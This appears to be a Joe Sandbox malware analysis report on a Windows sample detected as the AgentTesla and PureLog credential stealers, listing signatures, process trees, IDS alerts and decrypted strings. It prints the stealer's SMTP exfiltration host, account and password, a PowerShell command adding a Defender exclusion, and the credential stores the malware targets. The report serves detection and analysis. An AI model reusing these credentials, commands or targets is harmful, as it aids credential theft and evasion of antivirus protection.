Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LPO-2024-357.exe

Overview

General Information

Sample name:LPO-2024-357.exe
Analysis ID:1565672
MD5:b15e3e1eb0abfb4967c65bf33665fcbb
SHA1:fcd702629c1e38b7d08df3628920c22d4dab9a40
SHA256:137e0a944efefef514d0595cdfade088a59eb12404a1469e76cd024ebdb2d1f1
Tags:exeuser-threatcat_ch
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • LPO-2024-357.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\LPO-2024-357.exe" MD5: B15E3E1EB0ABFB4967C65BF33665FCBB)
    • powershell.exe (PID: 3844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7096 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • LPO-2024-357.exe (PID: 4348 cmdline: "C:\Users\user\Desktop\LPO-2024-357.exe" MD5: B15E3E1EB0ABFB4967C65BF33665FCBB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2923605654.000000000287A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.1700975172.00000000079A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000004.00000002.2921447380.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.1694260808.0000000003B01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000000.00000002.1694260808.0000000003B42000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              Click to see the 8 entries
              SourceRuleDescriptionAuthorStrings
              0.2.LPO-2024-357.exe.3d0a078.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                4.2.LPO-2024-357.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  0.2.LPO-2024-357.exe.3d33098.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.LPO-2024-357.exe.79a0000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      0.2.LPO-2024-357.exe.2dac680.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 4 entries

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LPO-2024-357.exe", ParentImage: C:\Users\user\Desktop\LPO-2024-357.exe, ParentProcessId: 6516, ParentProcessName: LPO-2024-357.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe", ProcessId: 3844, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LPO-2024-357.exe", ParentImage: C:\Users\user\Desktop\LPO-2024-357.exe, ParentProcessId: 6516, ParentProcessName: LPO-2024-357.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe", ProcessId: 3844, ProcessName: powershell.exe
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\LPO-2024-357.exe, Initiated: true, ProcessId: 4348, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LPO-2024-357.exe", ParentImage: C:\Users\user\Desktop\LPO-2024-357.exe, ParentProcessId: 6516, ParentProcessName: LPO-2024-357.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe", ProcessId: 3844, ProcessName: powershell.exe
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-30T14:19:39.797227+010020301711A Network Trojan was detected192.168.2.449734199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-30T14:18:05.436393+010028555421A Network Trojan was detected192.168.2.449734199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-30T14:18:05.436393+010028552451A Network Trojan was detected192.168.2.449734199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-30T14:19:39.797227+010028397231Malware Command and Control Activity Detected192.168.2.449734199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-30T14:19:39.797227+010028400321A Network Trojan was detected192.168.2.449734199.79.62.115587TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                        Source: LPO-2024-357.exeReversingLabs: Detection: 63%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Source: LPO-2024-357.exeJoe Sandbox ML: detected
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: /log.tmp
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <br>[
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ]<br>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <br>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Time:
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <br>User Name:
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <br>Computer Name:
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <br>OSFullName:
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <br>CPU:
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <br>RAM:
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <br>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: IP Address:
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <br>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <hr>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: New
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: IP Address:
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: false
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: false
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: false
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: false
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: false
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: false
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: false
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: false
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: false
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: mail.mbarieservicesltd.com
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: saless@mbarieservicesltd.com
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: *o9H+18Q4%;M
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: iinfo@mbarieservicesltd.com
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: false
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: false
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: appdata
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: KTvkzEc
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: KTvkzEc.exe
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: KTvkzEc
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Type
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <br>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <hr>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <br>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <b>[
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ]</b> (
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: )<br>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {BACK}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {ALT+TAB}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {ALT+F4}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {TAB}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {ESC}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {Win}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {CAPSLOCK}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {KEYUP}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {KEYDOWN}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {KEYLEFT}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {KEYRIGHT}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {DEL}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {END}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {HOME}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {Insert}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {NumLock}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {PageDown}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {PageUp}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {ENTER}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {F1}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {F2}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {F3}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {F4}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {F5}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {F6}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {F7}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {F8}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {F9}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {F10}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {F11}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {F12}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: control
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {CTRL}
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: &amp;
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: &lt;
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: &gt;
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: &quot;
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <hr>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: logins
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: IE/Edge
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Windows Secure Note
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Windows Web Password Credential
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Windows Credential Picker Protector
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Web Credentials
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Windows Credentials
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Windows Domain Password Credential
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Windows Extended Credential
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SchemaId
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: pResourceElement
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: pIdentityElement
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: pPackageSid
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: IE/Edge
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: UC Browser
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: UCBrowser\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Login Data
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: journal
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: wow_logins
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Safari for Windows
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <array>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <dict>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <string>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: </string>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <string>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: </string>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <data>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: </data>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: -convert xml1 -s -o "
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \fixed_keychain.xml"
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Microsoft\Protect\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: credential
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: QQ Browser
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Default\EncryptedStorage
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Profile
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \EncryptedStorage
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: entries
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: category
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: str3
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: str2
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: blob0
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: password_value
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: IncrediMail
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: PopPassword
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SmtpPassword
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Accounts_New
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: PopPassword
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SmtpPassword
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SmtpServer
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: EmailAddress
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Eudora
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: current
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Settings
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SavePasswordText
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Settings
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ReturnAddress
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Falkon Browser
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \falkon\profiles\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: profiles.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: profiles.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \browsedata.db
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: autofill
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ClawsMail
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Claws-mail
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \clawsrc
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \clawsrc
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: passkey0
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \accountrc
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: smtp_server
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: address
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: account
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \passwordstorerc
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Flock Browser
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: APPDATA
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Flock\Browser\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: signons3.txt
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: DynDns
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: username=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: password=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: https://account.dyn.com/
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: t6KzXhCh
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: global
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: accounts
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: account.
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: username
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: account.
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Psi/Psi+
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: name
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Psi/Psi+
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: APPDATA
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Psi\profiles
